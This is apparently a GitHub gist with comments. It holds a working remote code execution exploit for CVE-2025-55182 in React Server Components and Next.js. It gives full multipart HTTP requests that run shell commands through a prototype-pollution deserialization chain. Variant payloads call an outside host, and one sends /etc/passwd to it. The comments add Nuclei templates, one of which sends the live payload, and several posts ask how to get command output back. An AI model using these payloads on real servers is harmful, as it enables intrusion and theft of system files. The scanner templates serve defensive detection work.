CVE-2025-55182 React Server Components RCE POC

README.md

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to get a Chunk reference, and put Chunk.prototype.then as the then property of the root object. Then then would be invoked with root object as this/chunk when it is awaited/resolved.

By setting the status to RESOLVED_MODEL, now we can call initializeModelChunk with a fake chunk that is comlpetely in our control. This is particularly useful since itself and its related functions call many methods from the chunk._response object.

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with payload from response._prefix and return the result directly. So all we need is to set response._formData.get to Function so the returned result would be a function with attacker controlled code, then put that to then again so it would be executed.

CVE-2025-55182.http

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Good job!

currently, no response, can change payload to request OAST platform like BurpSuite Collaborator.

⚠️⚠️⚠️ replace an1cuzsce8cmffflh8grs1u5uw0nodc2.oastify.com to your own OAST/dnslog domain, or you can't see the execution result

make http request

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('https').get('https://an1cuzsce8cmffflh8grs1u5uw0nodc2.oastify.com/test');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

send /etc/passwd

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('https').request({hostname:'an1cuzsce8cmffflh8grs1u5uw0nodc2.oastify.com',path:'/test',method:'POST'}).end(process.mainModule.require('fs').readFileSync('/etc/passwd'));","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

I've written a non-invasive scanner and a reproducible setup environment for this vulnerability. can find it here: https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

The repository includes Memory Shell Payload 🚨

good work

niubi

牛逼

牛了

牛逼

Really good work! 🔥

any way to do it without using constructor? i manage to try $1:__proto__:constructor and it worked... but still, i wonder if we have other payloads

1. Active Detection Template (Based on PoC Payload)
   This sends the adapted PoC multipart request from the first Gist, checking for exploitation indicators like timeouts or deserialization errors. It mimics the chunk pollution ($1:proto:then), resolved model status, and _formData.get gadget but with a safe echo.
   Save as cve-2025-55182-detection.yaml

id: CVE-2025-55182-detection

info:
  name: React Server Components RCE Detection (Flight Deserialization)
  author: xai
  severity: critical
  description: Detects CVE-2025-55182 via crafted Flight chunk deserialization leading to potential RCE. Based on public PoC exploiting unsafe path traversal and gadget invocation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
    - https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
    - https://gist.github.com/HerringtonDarkholme/87f14efca45f7d38740be9f53849a89f
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-55182
  tags: cve,cve2025,react,nextjs,rce,ssrf,deserialization,flight-protocol

http:
  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Next-Action: x  # Triggers Server Action processing (arbitrary ID)
    body: |
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
      Content-Disposition: form-data; name="0"

      { "then" : "$1:__proto__:then" , "status" : "resolved_model" , "reason" : -1 , "value" : "{ \"then\" : \"$B1337\" }" , "_response" :{ "_prefix" : "process.mainModule.require('child_process').execSync('echo vulnerable');" , "_formData" :{ "get" : "$1:constructor:constructor" }}}
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
      Content-Disposition: form-data; name="1"

      "$@0"
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    matchers-condition: or
    matchers:
      - type: status
        status:
          - -1  # Connection timeout/hang (common on success)
          - 504  # Gateway timeout
      - type: word
        words:
          - "Invalid chunk reference"  # Deserialization failure (patched)
          - "ReactFlightReplyServer"  # Stack trace leak
          - "getOutlinedModel"  # Internal func from write-up
        part: body
        condition: and
      - type: dsl
        dsl:
          - "contains(body, 'prototype') && contains(body, 'constructor')"  # Pollution traces
        condition: and

    extractors:
      - type: regex
        name: action_id
        part: header
        group: 1
        regex:
          - 'Next-Action: ([a-f0-9]{40})'  # Extract if present for chaining

2. Passive Version Detection Template
   This checks for vulnerable React/Next.js versions via common exposure points (e.g., error pages, headers, or manifest). Complements the active template for low-noise scanning. Based on affected versions from CVE (19.0.0–19.2.0) and write-up's protocol details.
   Save as cve-2025-55182-versions.yaml:

id: CVE-2025-55182-versions

info:
  name: React Server Components Vulnerable Versions
  author: xai
  severity: high
  description: Detects versions of React Server Components affected by CVE-2025-55182 (unsafe Flight deserialization). Scans for version exposure in headers, errors, or JS bundles.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
    - https://gist.github.com/HerringtonDarkholme/87f14efca45f7d38740be9f53849a89f  # Flight protocol analysis
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-55182
  tags: cve,cve2025,react,nextjs,version,rce,flight-protocol

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/_next/static/chunks/app/page.js"  # Common Next.js bundle
      - "{{BaseURL}}/api/health"  # Probe for errors exposing versions

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "19.0.0"
          - "19.1.0"
          - "19.1.1"
          - "19.2.0"
        part: body
        condition: and
      - type: regex
        regex:
          - "(react-server-dom-webpack|react-server-dom-parcel|react-server-dom-turbopack).*?(19\\.(0|1(\\.1)?|2)\\.0)"
        part: body
      - type: dsl
        dsl:
          - "contains(body, 'ReactFlight') && status_code == 200"  # Flight exposure without patch errors
        condition: and

    extractors:
      - type: regex
        name: react_version
        part: body
        group: 1
        regex:
          - 'react-server-dom[^"]*?([0-9.]+)'

nb

Oh skibbidy, this isn't good. Great PoC

nb

good work

6

吓的我关闭了服务器

niubi

good job

wow

how to extract
Next-Action: x
ID

is it possible to return the result of executing a command in response to a request? You will not be able to send to the collaborator due to network restrictions.

E Z one

牛逼